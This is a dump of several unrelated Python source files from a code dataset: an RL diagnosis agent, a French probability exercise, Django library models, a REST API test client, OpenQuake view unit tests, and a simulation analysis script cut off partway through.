loss = self.compute_loss(batch_s, batch_a, batch_r, batch_d, batch_s_)\n \n self.optimizer.zero_grad()\n loss.backward()\n for p in self.model.parameters(): p.grad.data.clamp_(min=-5., max=5.)\n self.optimizer.step()\n \n def update_reclassifier(self, verbose=False):\n if (self.learn_step_counter % self.target_update_freq != 0):\n return\n if verbose:\n print(\"#### UPDATE CHECKER ####\")\n input_data_input_mask, input_label = self.memory_checker.sample(self.batch_size)\n\n input_data = input_data_input_mask[:, :66]\n input_mask = input_data_input_mask[:, 66:]\n \n input_data_masked = torch.from_numpy(np.random.randint(2, size=input_data.shape).astype(np.float32)*input_data).to(self.params['device'])\n input_data = torch.from_numpy(np.array(input_data).astype(np.float32)).to(self.params['device'])\n input_mask = torch.from_numpy(np.array(input_mask).astype(np.float32)).to(self.params['device'])\n input_label = torch.from_numpy(np.array(input_label).astype(np.int)).to(self.params['device'])\n \n self.optimizer_reclassifier.zero_grad()\n output_logits = self.reclassifier(input_data_masked)[input_mask==1]\n mask_label = input_data[input_mask==1]\n ce_loss = self.criterion_class(output_logits, (mask_label+1).long())\n ce_loss.backward()\n self.optimizer_reclassifier.step()\n\n \n def update_checker(self, verbose=False):\n if (self.learn_step_counter % self.target_update_freq != 0):\n return\n \n for i in range(self.num_bootstrap):\n input_data_input_mask, input_label = self.memory_checker.sample(self.batch_size)\n input_data = input_data_input_mask[:, :66]\n input_mask = input_data_input_mask[:, 66:]\n\n input_data = torch.from_numpy(np.array(input_data).astype(np.float32)).to(self.params['device'])\n input_mask = torch.from_numpy(np.array(input_mask).astype(np.float32)).to(self.params['device'])\n input_label = torch.from_numpy(np.array(input_label).astype(np.int)).to(self.params['device'])\n\n\n self.optimizer_classifier3[i].zero_grad()\n ce_loss = self.criterion_class(self.classifier3[i](input_data), input_label)\n ce_loss.backward()\n self.optimizer_classifier3[i].step()\n\ndef eval_all_patience(doctor, patience, writer, i_episode_out, verbose=False, threshold=0.):\n patience.user_id = -1\n ep_r = 0\n ep_s = 0\n ep_t = 0\n ep_ts = 0\n ep_o = 0\n ep_repeat = 0\n ep_conf = 0\n ep_num = 0\n ep_num_valid = 0\n ep_s_force = 0\n for i_episode in range(len(patience.goals)):\n obs = patience.reset()\n if verbose:\n print(\"########## id %d with dise %s ##########\"%(patience.user_id, patience.dise_list[patience.dise]))\n print(\"[Usr] %s\"%(np.array(patience.sym_list)[obs[66:132] != 0]))\n while True:\n obs_tensor = torch.from_numpy(obs.reshape(1, -1)).cuda()\n obs_tensor, prop_mean, prop_std = doctor.new_state(obs_tensor)\n a_act, _ = doctor.choose_action(obs_tensor, prop_mean, prop_std, test=True, verbose=False)\n \n if a_act < doctor.dise_len:\n if verbose: print(\"[Doc(%s, %.2f)] You got %s\"%(patience.dise_list[a_act], prop_mean[0, a_act], patience.dise_list[a_act]))\n else:\n if verbose: print(\"[Doc(%s, %.2f)] Do you have %s\"%(patience.dise_list[prop_mean.max(1)[1].item()], prop_mean.max(1)[0].item(), patience.sym_list[a_act-4]))\n \n obs_, r, done, info = patience.step(a_act)\n \n if verbose and not done: print(\"[Usr] %s\"%({-1: \"No\", 0: \"Not-sure\", 1:\"Yes\"}[obs_[a_act-4]]))\n \n ep_r += r\n if 'repeat' in info and info['repeat']:\n ep_repeat += 1\n \n if done:\n ep_t += info['runs']\n if info['success']:\n ep_s += 1\n if 'leave' not in info or not info['leave']:\n ep_num_valid += 1\n ep_ts += info['runs']\n ep_s_force += (prop_mean.max(1)[1].item() == patience.dise).item()\n ep_o += obs_[66:66*2].sum()\n ep_conf += prop_mean.max(1)[0].item()\n ep_num += 1\n break\n \n obs = obs_\n \n print(\"%s: numb %d | avg conf is %.2f | avg success is %.3f | avg success valid is %.3f | avg success force is %.3f| avg run is %.2f | avg repeat is %.2f | avg obs is %.2f\"%\\\n (patience.mode, ep_num, ep_conf/ep_num, ep_s/ep_num, (ep_s/ep_num_valid if ep_num_valid > 0 else 0), ep_s_force/ep_num, ep_t/ep_num, ep_repeat, ep_o/ep_num))\n \n logging.info(\"acc %.4f turn %.4f acc_valid %.4f turn_valid %.4f, acc_invalid %.4f valid %d conf_mean %s conf_std %s\"%\\\n (ep_s_force/ep_num, ep_t/ep_num, (ep_s/ep_num_valid if ep_num_valid > 0 else 0),\\\n (ep_ts/ep_num_valid if ep_num_valid > 0 else 0), ep_s/ep_num, ep_num_valid, prop_mean[0].data.cpu().numpy(), prop_std[0].data.cpu().numpy()))\n \n return ep_s_force/ep_num\n\n\n","sub_path":"code/camad_direct.py","file_name":"camad_direct.py","file_ext":"py","file_size_in_byte":28918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"3242679","text":"# exercise-probability-01.py\n\n# [xkcd: Frequentists vs. Bayesians](https://xkcd.com/1132/)\n\nimport random\n\n# code 1.1\n# L'appel à la fonction random.randint(0, 1) renvoit un nombre entier aléatoire compris entre 0 et 1 inclus.\nnumber = random.randint(0, 1)\n\n# code 1.2\n# Pour savoir si la variable \"number\" vaut 1, je peux utiliser un bloc conditionnel.\nif number == 0:\n print(\"le nombre vaut 0\")\n\n# code 1.3\n# Pour savoir quel nombre la variable \"number\" vaut, je peux utiliser une boucle.\nfor i in range(0, 2):\n if number == i:\n # affichage avec interpolation de la variable au moyen d'une \"f-string\"\n print(f\"le nombre vaut {number}\")\n\n# exo 1.1\n# Alice et Bob veulent jouer à pile ou face.\n# - si la variable \"head_or_tail\" vaut 0, cela équivaut à pile\n# - si elle vaut 1, cela équivaut à face\n# Alice parie pile et Bob parie face.\n# Qui gagne ? Alice ou Bob ?\n# Rédigez le code qui indique le nom du gagnant.\n\nhead_or_tail = random.randint(0, 1)\n\n# réponse 1.1\n\n# exo 1.2\n# Alice et Bob veulent jouer aux dés.\n# Alice parie qu'elle va faire au moins 4. Bob parie qu'il va faire 3 au plus.\n# Qui gagne ? Alice ou Bob ?\n# Rédigez le code qui indique le nom du gagnant.\n\ndice = random.randint(1, 6)\n\n# réponse 1.2\n\n# exo 1.3\n# Alice et Bob jouent à pierre papier ciseaux.\n# - 1 équivaut à pierre\n# - 2 équivaut à papier\n# - 3 équivaut à ciseaux\n# Rédigez le code qui indique qui gagne.\n\nalice = random.randint(1, 3)\nbob = random.randint(1, 3)\nprint(alice, bob)\n\n# réponse 1.3\n\n","sub_path":"exercise-probability-01.py","file_name":"exercise-probability-01.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"501152262","text":"from django.db import models\nimport uuid #required for unique book instances\n# Create your models here.\nclass Genre(models.Model):\n \"\"\"\n Model representing a book genre (e.g. Science Fiction, Non Fiction).\n \"\"\"\n name = models.CharField(max_length=200, help_text=\"Enter a book genre (e.g. Science Fiction, French Poetry etc.)\")\n\n def __str__(self):\n \"\"\"\n String for representing the Model object (in Admin site etc.)\n \"\"\"\n return self.name\n\nclass book(models.Model):\n \"\"\"\n Model representing a book \n \"\"\"\n title = models.CharField(max_length=20)\n author= models.ForeignKey('Author', on_delete=models.SET_NULL, null=True)\n summary= models.TextField(max_length=1000, help_text=\"Enter summary of book\")\n isbn= models.CharField('ISBN',max_length=50, help_text=\"13 character ISBN\")\n genre= models.ManyToManyField(Genre, max_length=100, help_text=\"Select genre for this book\")\n\n def display_genre(self):\n \"\"\"\n Creates a string for the Genre. This is required to display genre in Admin.\n \"\"\"\n return ', '.join([ genre.name for genre in self.genre.all()[:3] ])\n display_genre.short_description = 'Genre'\n\n def __str__(self):\n \"\"\"\n String for representing the Model object.\n \"\"\"\n\n return self.title\n\n def get_absolute_url(self):\n \"\"\"\n Returns the url to access a particular book instance.\n \"\"\"\n\n return reverse('book-detail', args=[str(str.id)])\n\nclass bookinstance (models.Model):\n\n id= models.UUIDField(primary_key=True, default=uuid.uuid4, help_text=\"unique ID for this particular book across whole liabrary\")\n book = models.ForeignKey('book', on_delete=models.SET_NULL, null=True) \n imprint = models.CharField(max_length=200)\n due_back = models.DateField(null=True, blank=True)\n LOAN_STATUS=(\n ('m', 'Maintenance'),\n ('o', 'on loan'),\n ('a', 'Available'),\n ('r', 'Reserved')\n )\n status = models.CharField(max_length=1, choices= LOAN_STATUS, blank=True, default='m', help_text='Book Availability')\n\nclass Meta:\n Ordering = [\"due_back\"]\n\n def __str__(self):\n return '%s (%s)' % (self.id, self.book.title)\n\n\nclass Author(models.Model):\n \"\"\"\n Model representing an author.\n \"\"\"\n first_name =models.CharField(max_length=100)\n last_name =models.CharField(max_length=100)\n date_of_birth= models.DateField(null=True)\n date_of_death= models.DateField(null=True)\n\n def get_absolute_url(self):\n return reverse ('author-detail',args=[str(self.id)])\n\n def __str__(self):\n \"\"\"\n String for representing the Model object.\n \"\"\"\n return '%s, %s' % (self.last_name, self.first_name)","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"227953099","text":"# Copyright (C) 2020 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\"\"\"REST API client.\"\"\"\n\nimport json\nimport urlparse\n\nimport requests\n\nfrom lib import environment, url as url_module, users\nfrom lib.constants import objects\nfrom lib.service.rest import session_pool\nfrom lib.service.rest.template_provider import TemplateProvider\n\n\nclass RestClient(object):\n \"\"\"Client for HTTP interactions with GGRC's REST API.\"\"\"\n\n STATUS_CODES = {'OK': 200,\n 'FAIL': [400, 404, 500]}\n\n def __init__(self, endpoint=\"\"):\n self.endpoint = endpoint if endpoint == url_module.QUERY else (\n objects.get_singular(endpoint))\n self.is_api = \"\" if endpoint == url_module.QUERY else url_module.API\n self.endpoint_url = urlparse.urljoin(\n environment.app_url, \"/\".join([self.is_api, endpoint]))\n self.session = session_pool.get_session(users.current_user())\n\n def get_session(self, obj_dict):\n \"\"\"Return newly create session if it is external user needed else\n session from the pool.\"\"\"\n return session_pool.create_session(\n users.current_user(), is_external=True) if (\n self.is_external_user_needed(obj_dict)) else (\n session_pool.get_session(users.current_user()))\n\n def is_endpoint_external(self):\n \"\"\"Checks if endpoint is external.\"\"\"\n return self.endpoint in objects.EXTERNAL_END_POINTS\n\n def is_relationship_types_external(self, obj_dict):\n \"\"\"Check if source or destination objects type is external.\"\"\"\n return (self.endpoint == objects.get_singular(objects.RELATIONSHIPS) and\n (any(x for x in objects.SINGULAR_DISABLED_OBJS\n if x.title() in (obj_dict[\"source\"][\"type\"],\n obj_dict[\"destination\"][\"type\"]))))\n\n def is_ca_external(self, obj_dict):\n \"\"\"Check if custom attribute is external.\"\"\"\n return (self.endpoint == objects.get_singular(\n objects.CUSTOM_ATTRIBUTES) and\n obj_dict[\"definition_type\"] in objects.ALL_SINGULAR_DISABLED_OBJS)\n\n def is_external_user_needed(self, obj_dict):\n \"\"\"Return True if request related to controls or GCAs for controls.\"\"\"\n # pylint: disable=invalid-name\n if not self.is_api:\n return False\n\n obj_dict = obj_dict[0][obj_dict[0].keys()[0]] if isinstance(\n obj_dict, list) else obj_dict[obj_dict.keys()[0]]\n\n return (self.is_endpoint_external() or\n self.is_ca_external(obj_dict) or\n self.is_relationship_types_external(obj_dict))\n\n def send_get(self, url, **kwargs):\n \"\"\"Send GET request to `url`\"\"\"\n url = urlparse.urljoin(environment.app_url, url)\n return self.session.get(url, **kwargs).json()\n\n def send_post(self, url, **kwargs):\n \"\"\"Send POST request to `url`\"\"\"\n url = urlparse.urljoin(environment.app_url, url)\n return self.session.post(url, **kwargs).json()\n\n def create_object(self, **kwargs):\n \"\"\"Create object or make other operations used POST request and\n return raw response.\n \"\"\"\n kwargs.pop(\"type\").lower()\n create_obj_req_body = self.generate_body(self.endpoint, **kwargs)\n if (\n self.is_api and self.is_external_user_needed(\n json.loads(create_obj_req_body))\n ):\n return requests.post(\n url=self.endpoint_url,\n data=create_obj_req_body,\n headers=self.get_session(json.loads(create_obj_req_body)).headers)\n else:\n return self.get_session(json.loads(create_obj_req_body)).post(\n url=self.endpoint_url, data=create_obj_req_body)\n\n def update_object(self, href, **kwargs):\n \"\"\"Update object used GET, POST requests and return raw response.\"\"\"\n href_url = urlparse.urljoin(environment.app_url, href)\n obj_resp = self.get_object(href_url)\n obj_resp_dict = json.loads(obj_resp.text)\n session = self.get_session(obj_resp_dict)\n headers_for_updation = self.req_headers_from_resp_headers(\n resp_headers=obj_resp.headers)\n update_obj_req_body = self.update_body(body=obj_resp.text, **kwargs)\n if self.is_api and self.is_external_user_needed(obj_resp_dict):\n headers_for_updation.update(session.headers)\n return requests.put(\n url=href_url, data=update_obj_req_body, headers=headers_for_updation)\n\n else:\n return session.put(\n url=href_url, data=update_obj_req_body, headers=headers_for_updation)\n\n def delete_object(self, href):\n \"\"\"Delete object used GET, POST requests and return raw response.\"\"\"\n href_url = urlparse.urljoin(environment.app_url, href)\n obj_resp = self.get_object(href_url)\n obj_resp_dict = json.loads(obj_resp.text)\n session = self.get_session(obj_resp_dict)\n headers_for_deleting = self.req_headers_from_resp_headers(\n resp_headers=obj_resp.headers)\n if self.is_api and self.is_external_user_needed(obj_resp_dict):\n headers_for_deleting.update(session.headers)\n return requests.delete(\n url=href_url, headers=headers_for_deleting)\n else:\n return session.delete(\n url=href_url, headers=headers_for_deleting)\n\n def get_object(self, href):\n \"\"\"Get object used GET request and return raw response.\"\"\"\n href_url = urlparse.urljoin(environment.app_url, href)\n get_obj_resp = self.session.get(url=href_url)\n return get_obj_resp\n\n def generate_body(self, type_name, **kwargs):\n \"\"\"Generate body of HTTP request based on JSON representation.\"\"\"\n body = TemplateProvider.generate_template_as_dict(\n json_tmpl_name=type_name, **kwargs)\n if not self.is_api:\n body = body[type_name]\n return json.dumps([body]).encode(\"string-escape\")\n\n @staticmethod\n def req_headers_from_resp_headers(resp_headers=None):\n \"\"\"Return request headers from response headers.\"\"\"\n headers = {}\n if resp_headers:\n headers[\"If-Match\"] = resp_headers[\"etag\"]\n headers[\"If-Unmodified-Since\"] = resp_headers[\"last-modified\"]\n return headers\n\n @staticmethod\n def update_body(body, **kwargs):\n \"\"\"Update body of HTTP request based on JSON representation.\"\"\"\n return json.dumps(TemplateProvider.update_template_as_dict(\n json_data_str=body, **kwargs)).encode(\"string-escape\")\n","sub_path":"test/selenium/src/lib/service/rest/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"324838769","text":"# -*- coding: utf-8 -*-\n# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright (c) 2010-2011, GEM Foundation.\n#\n# OpenQuake is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License version 3\n# only, as published by the Free Software Foundation.\n#\n# OpenQuake is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License version 3 for more details\n# (a copy is included in the LICENSE file that accompanied this code).\n#\n# You should have received a copy of the GNU Lesser General Public License\n# version 3 along with OpenQuake. If not, see\n# for a copy of the LGPLv3 License.\n\n\n\"\"\"\ndatabase related unit tests for the geonode/mtapi/views.py module.\n\"\"\"\n\n\nimport mock\nimport os\nimport unittest\n\nfrom django.conf import settings\n\nfrom geonode.mtapi.models import OqJob, Upload\nfrom geonode.mtapi.views import (\n prepare_job, prepare_job_result, prepare_map_result, start_job)\nfrom geonode.mtapi import view_utils\n\nfrom db_tests.helpers import DbTestMixin\n\n\ndef get_post_params(additional_fields=None):\n \"\"\"\n Return a dictionary similar to the POST parameters received by the\n \"hazard_risk_calc\" API endpoint.\n\n :param dict additional_data: additional data the caller wants added to the\n dict to be returned.\n \"\"\"\n upload = DbTestMixin().setup_upload()\n post_params = {\n \"model\": \"openquake.calculationparams\",\n \"upload\": upload.id,\n \"fields\":\n {\"job_type\": \"classical\",\n \"region_grid_spacing\": 0.1,\n \"min_magnitude\": 5,\n \"investigation_time\": 50,\n \"component\": \"average\",\n \"imt\": \"pga\",\n \"truncation_type\": \"none\",\n \"truncation_level\": 3.0,\n \"reference_v30_value\": 800,\n \"imls\": [0.2, 0.02, 0.01],\n \"poes\": [0.2, 0.02, 0.01],\n \"realizations\": 6,\n \"region\": \"POLYGON((16.460737205888 41.257786872643, \"\n \"16.460898138429 41.257786872643, 16.460898138429 \"\n \"41.257923984376, 16.460737205888 41.257923984376, \"\n \"16.460737205888 41.257786872643))\"}}\n if additional_fields:\n post_params[\"fields\"].update(additional_fields)\n return post_params\n\n\nclass PrepareJobResultTestCase(unittest.TestCase, DbTestMixin):\n \"\"\"Tests the behaviour of views.prepare_job_result().\"\"\"\n\n def tearDown(self):\n if getattr(self, \"upload\", None) and self.upload:\n self.teardown_upload(self.upload)\n if getattr(self, \"job_to_teardown\", None) and self.job_to_teardown:\n self.teardown_job(self.job_to_teardown)\n\n def test_prepare_job_result_with_failed(self):\n \"\"\"\n The result dictionary for failed OpenQuake jobs is prepared correctly.\n \"\"\"\n post_params = get_post_params()\n job = prepare_job(post_params)\n self.upload = job.oq_params.upload\n job.status = \"failed\"\n self.assertEqual(\n {\"msg\": \"Calculation failed\", \"status\": \"failure\",\n \"id\": job.id},\n prepare_job_result(job))\n\n def test_prepare_job_result_with_succeeded_no_maps(self):\n \"\"\"\n The result dictionary for succeeded OpenQuake jobs (w/o hazard/loss\n maps) is prepared correctly.\n \"\"\"\n post_params = get_post_params()\n job = prepare_job(post_params)\n self.upload = job.oq_params.upload\n job.status = \"succeeded\"\n self.assertEqual(\n {\"msg\": \"Calculation succeeded\", \"status\": \"success\",\n \"id\": job.id, \"files\": []},\n prepare_job_result(job))\n\n def test_prepare_job_result_with_succeeded_and_maps(self):\n \"\"\"\n The result dictionary for succeeded OpenQuake jobs (w/o hazard/loss\n maps) is prepared correctly.\n \"\"\"\n hazard_map = self.setup_output()\n self.job_to_teardown = job = hazard_map.oq_job\n self.add_shapefile_data(hazard_map)\n hazard_layer, _ = os.path.splitext(\n os.path.basename(hazard_map.shapefile_path))\n hazard_file = os.path.basename(hazard_map.path)\n\n loss_map = self.setup_output(job_to_use=job, output_type=\"loss_map\")\n self.add_shapefile_data(loss_map)\n loss_layer, _ = os.path.splitext(\n os.path.basename(loss_map.shapefile_path))\n loss_file = os.path.basename(loss_map.path)\n job.status = \"succeeded\"\n expected = {\n \"id\": job.id,\n \"msg\": \"Calculation succeeded\",\n \"status\": \"success\",\n \"files\": [\n {\"id\": hazard_map.id,\n \"layer\": {\n \"layer\": \"geonode:hazard_map_data\",\n \"filter\": \"output_id=%s\" % hazard_map.id,\n \"ows\": \"http://gemsun02.ethz.ch/geoserver-geonode-dev/ows\"},\n \"min\": view_utils.round_float(hazard_map.min_value),\n \"max\": view_utils.round_float(hazard_map.max_value),\n \"name\": \"%s-%s\" % (job.id, hazard_file),\n \"type\": \"hazard map\"},\n {\"id\": loss_map.id,\n \"layer\": {\n \"layer\": \"geonode:loss_map_data\",\n \"filter\": \"output_id=%s\" % loss_map.id,\n \"ows\": \"http://gemsun02.ethz.ch/geoserver-geonode-dev/ows\"},\n \"min\": view_utils.round_float(loss_map.min_value),\n \"max\": view_utils.round_float(loss_map.max_value),\n \"name\": \"%s-%s\" % (job.id, loss_file),\n \"type\": \"loss map\"}]}\n\n actual = prepare_job_result(job)\n self.assertEqual(expected, actual)\n\n\nclass PrepareJobTestCase(unittest.TestCase, DbTestMixin):\n \"\"\"Tests the behaviour of views.prepare_job().\"\"\"\n\n def tearDown(self):\n self.teardown_upload(self.upload)\n\n def test_prepare_job(self):\n \"\"\"\n `prepare_job` returns a :py:class:`geonode.mtapi.models.OqJob`\n instance. The latter's `oq_params` property refers to the correct\n upload record.\n \"\"\"\n post_params = get_post_params()\n job = prepare_job(post_params)\n self.assertTrue(isinstance(job, OqJob))\n self.upload = Upload.objects.get(id=post_params[\"upload\"])\n self.assertEqual(self.upload, job.oq_params.upload)\n\n def test_prepare_job_param_values(self):\n \"\"\"\n `prepare_job` returns a :py:class:`geonode.mtapi.models.OqJob`\n instance. The latter's `oq_params` property is initialized correctly.\n \"\"\"\n post_params = get_post_params()\n oqp = prepare_job(post_params).oq_params\n self.upload = oqp.upload\n trans_tab = dict(reference_v30_value=\"reference_vs30_value\")\n param_names = (\n \"job_type\", \"region_grid_spacing\", \"min_magnitude\",\n \"investigation_time\", \"component\", \"imt\", \"truncation_type\",\n \"truncation_level\", \"reference_v30_value\", \"imls\", \"poes\",\n \"realizations\")\n for param_name in param_names:\n attr_name = trans_tab.get(param_name, param_name)\n self.assertEqual(getattr(oqp, attr_name),\n post_params[\"fields\"][param_name])\n\n def test_prepare_job_ignored_params(self):\n \"\"\"\n `prepare_job()` ignores the following parameters: \"period\",\n \"gm_correlated\" and \"histories\" for classical job types.\n \"\"\"\n ignored_fields = {\"period\": 1, \"histories\": 1, \"gm_correlated\": False}\n post_params = get_post_params(ignored_fields)\n oqp = prepare_job(post_params).oq_params\n self.upload = oqp.upload\n trans_tab = dict(reference_v30_value=\"reference_vs30_value\")\n param_names = (\n \"job_type\", \"region_grid_spacing\", \"min_magnitude\",\n \"investigation_time\", \"component\", \"imt\", \"truncation_type\",\n \"truncation_level\", \"reference_v30_value\", \"imls\", \"poes\",\n \"realizations\")\n for param_name in param_names:\n attr_name = trans_tab.get(param_name, param_name)\n self.assertEqual(getattr(oqp, attr_name),\n post_params[\"fields\"][param_name])\n\n\nclass StartJobTestCase(unittest.TestCase, DbTestMixin):\n \"\"\"Tests the behaviour of views.start_job().\"\"\"\n\n def tearDown(self):\n self.teardown_upload(self.upload)\n\n def test_start_job(self):\n \"\"\"\n The oqrunner process is started with the correct path/arguments and\n its process ID (pid) is captured in the corresponding job record.\n \"\"\"\n post_params = get_post_params()\n job = prepare_job(post_params)\n self.upload = job.oq_params.upload\n process_mock = mock.MagicMock(name=\"mock:the-process\")\n process_mock.pid = 31459\n popen_mock = mock.MagicMock(name=\"mock:subprocess.Popen\")\n popen_mock.return_value = process_mock\n with mock.patch('subprocess.Popen', new=popen_mock):\n self.assertEqual(0, job.job_pid)\n start_job(job)\n args, _kwargs = popen_mock.call_args\n self.assertEqual(\n ([settings.OQRUNNER_PATH, \"-j\", str(job.id)],), args)\n self.assertEqual(31459, job.job_pid)\n\n\nclass PrepareMapResultTestCase(unittest.TestCase, DbTestMixin):\n \"\"\"Tests the behaviour of views.prepare_map_result().\"\"\"\n\n def tearDown(self):\n self.teardown_output(self.output)\n\n def test_prepare_map_result_with_hazard(self):\n \"\"\"\n prepare_map_result() returns a correct result dictionary for a\n hazard map.\n \"\"\"\n self.output = self.setup_output()\n self.output.min_value, self.output.max_value = (10.0, 20.0)\n\n name = os.path.basename(self.output.path)\n map_type = (\"hazard map\" if self.output.output_type == \"hazard_map\"\n else \"loss map\")\n expected = {\n \"layer\": {\n \"layer\": \"geonode:hazard_map_data\",\n \"filter\": \"output_id=%s\" % self.output.id,\n \"ows\": \"http://gemsun02.ethz.ch/geoserver-geonode-dev/ows\"},\n \"name\": \"%s-%s\" % (self.output.oq_job.id, name),\n \"min\": view_utils.round_float(self.output.min_value),\n \"max\": view_utils.round_float(self.output.max_value),\n \"type\": map_type,\n \"id\": self.output.id}\n\n actual = prepare_map_result(self.output)\n self.assertEqual(expected, actual)\n\n def test_prepare_map_result_with_loss(self):\n \"\"\"\n prepare_map_result() returns a correct result dictionary for a\n hazard map.\n \"\"\"\n self.output = self.setup_output(output_type=\"loss_map\")\n self.output.min_value, self.output.max_value = (30.0, 40.0)\n\n name = os.path.basename(self.output.path)\n map_type = (\"loss map\" if self.output.output_type == \"loss_map\"\n else \"loss map\")\n expected = {\n \"layer\": {\n \"layer\": \"geonode:loss_map_data\",\n \"filter\": \"output_id=%s\" % self.output.id,\n \"ows\": \"http://gemsun02.ethz.ch/geoserver-geonode-dev/ows\"},\n \"name\": \"%s-%s\" % (self.output.oq_job.id, name),\n \"min\": view_utils.round_float(self.output.min_value),\n \"max\": view_utils.round_float(self.output.max_value),\n \"type\": map_type,\n \"id\": self.output.id}\n\n actual = prepare_map_result(self.output)\n self.assertEqual(expected, actual)\n","sub_path":"db_tests/mtapi_views_unittest.py","file_name":"mtapi_views_unittest.py","file_ext":"py","file_size_in_byte":11672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"320171501","text":"from mcsim import MCDataSim\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport json\nimport pandas as pd\nimport seaborn as sns\nfrom mcsim import remove_redundant_ticks\n\nclass ExploringRIMK(MCDataSim):\n def __init__(*args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def exploring_rim_k(self, noise_index: int = 3, topk=10, p=3, save_dir=None, arim=True, algo=\"ppo\"):\n fs=25; algname1=\"\"\n if algo == \"lbfgs\":\n ni = None\n else:\n ni = self.noises[noise_index]\n pdf_dict = json.load(open(self.get_mcname(ni, self.noises), \"rb\"))\n pdf_dict = np.array(pdf_dict[algo]) # shape (noise, cont, samples)\n #idx = self.get_top_k_by_fid_idx(pdf_dict[0].mean(axis=-1), topk)\n pdf_dict = pdf_dict[np.ix_(np.ones(pdf_dict.shape[0], dtype=bool), \n self.get_ranks(-1*pdf_dict[0].mean(axis=-1))<=topk)] # filter by observed fid\n from wd_sortof_fast_implementation import RIM_p\n def get_rim_function(k):\n from scipy.stats import skew, kurtosis\n if k==\"var\":\n rim = lambda cont_dist: cont_dist.var()\n elif k==\"skewness\":\n rim = lambda cont_dist: 0 #skew(cont_dist)\n elif k==\"kurtosis\":\n rim = lambda cont_dist: 0# kurtosis(cont_dist)\n else:\n rim = lambda cont_dist : RIM_p(cont_dist, p=k)\n return rim\n\n def rim_k(k):\n rimks = np.array([list(map(get_rim_function(k), pdf_dict[i])) for i in range(len(pdf_dict))])\n # idxes1 = self.get_top_k_by_fid_idx(rimks, topk=topk)\n # rimks = rimks[idxes1]\n return rimks\n rim_ks = [rim_k(k) for k in range(1,p+1)] # (k, noise, cont)\n rim_ks.append(rim_k(\"var\"))\n rim_ks.append(rim_k(\"skewness\"))\n rim_ks.append(rim_k(\"kurtosis\"))\n rim_ks= np.array(rim_ks)\n reg_coeffs = np.zeros((p+1+3, topk)) # (k, cont)\n \n # arim moments\n if arim:\n fig, ax = plt.subplots()\n for k in list(range(1,len(rim_ks)-2))+[\"var\", \"skewness\", \"kurtosis\"]:\n if isinstance(k, int):\n label=f\"ARIM {k+1}\"\n else:\n label=k\n ax.plot(self.noises, list(map(get_rim_function(k), 1-rim_ks[0])), label=label)\n ax.set_title(f\"algo {algo} nlevel opt. {noise_index*0.01} top-k={topk}\")\n ax.set_xlabel(\"noise\")\n ax.set_ylabel(\"ARIM_p\")\n ax.legend()\n if save_dir:\n fig.savefig(save_dir+\"/\"+\"arim_p_\"+ algo + f\"_noise_opt{ni}\" +f\"_L{self.Nspin}_O{self.outspin}.png\",\n dpi=1000, bbox_inches=\"tight\")\n return\n fig, ax = plt.subplots(1,1)\n for cont in range(topk):\n # for i in range(len(self.noises)):\n # plt.figure()\n # label=\"\"\n # for k in range(len(rim_ks)):\n # z=\"rim k={}: {} \".format(k+1, round(rim_ks[k][i][cont],6))\n # label+= z\n # label += f\"noise lvl: {i}\"\n # plt.hist(pdf_dict[i][cont], bins=np.linspace(0,1,50))\n # plt.title(label)\n for k in range(len(rim_ks)):\n color=self.colors[k]\n if cont==0:\n label=f\"rim {k+1}\"\n if k==p:\n label=\"var\"\n elif k==p+1:\n label=\"skewness\"\n elif k==p+2:\n label=\"kurtosis\"\n else:\n label=None\n from scipy.stats import linregress \n assert rim_ks[k][:,cont].shape[-1]==11, f\"Not in the noise level index yet {rim_ks[k][:,cont].shape[-1]}\"\n if k==0:\n reg_coeff = linregress(self.noises, rim_ks[k][:,cont])[0]\n reg_coeffs[k][cont] = reg_coeff\n reg_coeffs[k+1][cont] = rim_ks[k][:,cont][1]\n else:\n if k < p:\n reg_coeffs[k+1][cont] = rim_ks[k][:,cont][1]-rim_ks[0][:,cont][1] # at noise level 1\n else:\n reg_coeffs[k+1][cont] = rim_ks[k][:,cont][1]\n ax.plot(self.noises, rim_ks[k][:,cont], label=label,color=color)\n ax.set_xlabel(\"noise\")\n ax.set_ylabel(\"RIM_k\")\n ax.legend()\n cols = []\n for k in range(len(rim_ks)-3):\n if k==0:\n cols.append(f\"RIM_1 growth factor {k+1}\")\n cols.append(f\"RIM {k+1}\")\n else:\n cols.append(f\"RIM {k+1}\")\n cols.append(f\"Var\")\n cols.append(f\"Skew\")\n cols.append(f\"Kurt\")\n df = pd.DataFrame(reg_coeffs.T, columns=cols)\n print(df.corr())\n plt.figure()\n g = sns.pairplot(df, corner=True)\n def corrfunc(x, y, **kws):\n from scipy.stats import kendalltau\n r, _ = kendalltau(x, y)\n ax = plt.gca()\n ax.annotate(\"tau = {:.2f}\".format(r),\n xy=(.1, .9), xycoords=ax.transAxes)\n g.map_lower(corrfunc)\n\n raise AssertionError\n lbfgs_wd_data = self.get_metrics_dict(None, self.noises, algoname=\"lbfgs\")[\"lbfgs\"]\n wd_data_c1 = np.array(lbfgs_wd_data[r'$W(.,\\delta(x-1))$'])\n print(wd_data_c1.shape)\n idxes1 = self.get_top_k_by_fid_idx(wd_data_c1, topk=topk)\n wd_data_c1 = wd_data_c1[idxes1]\n # wd_data_u, wd_data_l = wd_data[r'$W(.,\\delta(x-1))$'+ ' upper'], wd_data[r'$W(.,\\delta(x-1))$'+ ' lower'] \n \n q951 = np.array(lbfgs_wd_data['Q th. 0.95'])[idxes1]\n q981 = np.array(lbfgs_wd_data['Q th. 0.98'])[idxes1]\n \n 